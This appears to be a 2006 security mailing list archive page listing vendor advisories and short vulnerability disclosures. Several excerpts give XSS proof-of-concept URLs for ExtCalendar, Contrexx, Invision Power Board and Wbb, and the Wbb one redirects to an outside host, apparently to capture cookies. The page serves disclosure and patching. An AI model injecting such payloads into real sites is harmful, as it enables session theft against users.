[security bulletin] SSRT051128 rev.1 - HP-UX VirtualVault running Apache 1.3.X Remote Unauthorized Access
2006-03-20, security-alert hp com

[SECURITY] [DSA 1009-1] New crossfire packages fix arbitrary code execution
2006-03-20, joey infodrom org (Martin Schulze)

[SECURITY] [DSA 960-3] New libmail-audit-perl packages fix insecure temporary file use
2006-03-20, joey infodrom org (Martin Schulze)

ExtCalendar v1.0 Multiple Xss Vuln
2006-03-19, Soothackers gmail com

  ------------------------------------------
  ExtCalendar v1.0 Multiple Xss Vuln
  ------------------------------------------
  Bug:
  http://victim/path/calendar.php?op=cal&month=3&year="><script>alert(/Soot/)</script>
  http://victim/path/calendar.php?op=cal&month="><script>alert(/Soot/)</script>&ye

Xss in Wbb 2.3.4
2006-03-18, r57shell gmail com

  hi again friends
  i discovered a xss in wbb again ;)
  in wbb/acp/lib/class_db_mysql.php in the 123.line
  $errormsg .= "<b>Script:</b> ".getenv("REQUEST_URI")."\n<br>";
  hmm what can we do with that?
  if there is an sql db error you may do
  /wbb/xx.php?<script>location.href='http://yoursite.com/xss.ph

Contrexx CMS Xss Vuln
2006-03-18, Soothackers gmail com

  ------------------------------------------
  ***Contrexx CMS Xss Vuln***
  ------------------------------------------
  Site : http://www.contrexx.com
  Bug : http://victim/path/index.php/"><script>alert(/Soot/)</script>
  Vulnerable : All Version ( => v1.0.8 )
  --------------------------------

[FLSA-2006:174479] Updated libungif packages fix security issues
2006-03-17, Marc Deslauriers (marcdeslauriers videotron ca)

[FLSA-2006:157459-2] Updated kernel packages fix security issues
2006-03-17, Marc Deslauriers (marcdeslauriers videotron ca)

Oxynews Sql İnjection
2006-03-16, r00t3rr0r gmail com

  Oxynews Sql İnjection
  Website: http://www.oxynews.net/
  Demo: http://www.scriptevi.com/files/demo/news/oxynews/
  -------------------------------------------------------------------
  Credit: R00t3RR0R
  Website: www.biyosecurity.be / www.biyo.tk
  mail: r00t3rr0r (at) gmail (dot) com
  ----------------------------

[FLSA-2006:173274] Updated gdk-pixbuf packages fix security issues
2006-03-17, Marc Deslauriers (marcdeslauriers videotron ca)

Re: Linux zero IP ID vulnerability?
2006-03-17, Marco Ivaldi (raptor 0xdeadbeef info)

  > Hi Marco!

  Hey Andrea,

  > - [PIRELLI HOME ACCESS GATEWAY]

  Based on your tests, this device shows the standard incremental IP ID behaviour: so, nothing special here.

  > - [MY BOX WITH 2.6.15.6 #1 i686 pentium4 GNU/Linux (vanilla)]
  [snip]
  > (closed port + S flag)
  > bunker@syn:~$ cat hping.closed

[SECURITY] [DSA 1006-1] New wzdftpd packages fix arbitrary shell command execution
2006-03-16, Moritz Muehlenhoff (jmm debian org)

[SECURITY] [DSA 1008-1] New kpdf packages fix arbitrary code execution
2006-03-17, joey infodrom org (Martin Schulze)

Fedora Legacy Server Outage
2006-03-17, Marc Deslauriers (marcdeslauriers videotron ca)

  As we sent out today's security advisories, one of our servers experienced an outage before completely syncing to the mirrors. As a result, the updates repository contains missing packages.

  This situation should be corrected shortly. I apologize for any problems this may cause.

  Marc.

[FLSA-2006:157459-1] Updated kernel packages fix security issues
2006-03-17, Marc Deslauriers (marcdeslauriers videotron ca)

Re: Remote overflow in MSIE script action handlers (mshtml.dll)
2006-03-17, c0redump ackers org uk

  Worked like a treat first time on IE 6.0.2900.2180.xpsp_sp2_gdr.050301-1519 and exited with error:

  "Unhandled exception at 0x7d56a08d in iexplore.exe: 0xC0000005: Access violation writing location 0x037c7eb8."

  c0redump

  ----- Original Message -----
  From: Michal Zalewski
  To: Daniel Bonekeeper
  Cc

Generically Determining the Prescence of Virtual Machines
2006-03-17, valsmith metasploit com

  At OffensiveComputing we were looking at ways to detect virtual machines and had found and discarded many unsophisticated methods such as looking for VMWare Tools running as a service or VMWare related registry keys, etc. Then we discovered Joanna Rutkowska's very interesting "Redpill" method. This w

Symantec Security Advisory SYM06-004
2006-03-17, secure symantec com

  Symantec Security Advisory
  SYM06-004
  17 March 2006
  Veritas Backup Exec: Application Memory Denial of Service

  Revision History
  None

  Severity
  Medium

  Remote Access - Yes
  Local Access - No
  Authentication Required - No
  Exploit publicly available - No

XSS IN Invision Power Board
2006-03-17, ???? ???? (mr_snake_my hotmail com)

  Software: Invision Power Board
  Web Site: http://www.invisionpower.com
  tested in v2.0.4
  exploit :
  forum/index.php?act=Search&nav=au&CODE=show&searchid=5f25843edb0242889889796819a2b367&search_in=ooo&result_type='><script>alert(document.cookie)</script>
  forum/index.php?act=Search&nav=au&CODE=show&
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c00612828
Version: 1
HPSBUX02101 SSRT051128 rev.1 - HP-UX VirtualVault running Apache
1.3.X Remote Unauthorized Access
NOTICE: The information in this Security Bulletin should be acted
upon as s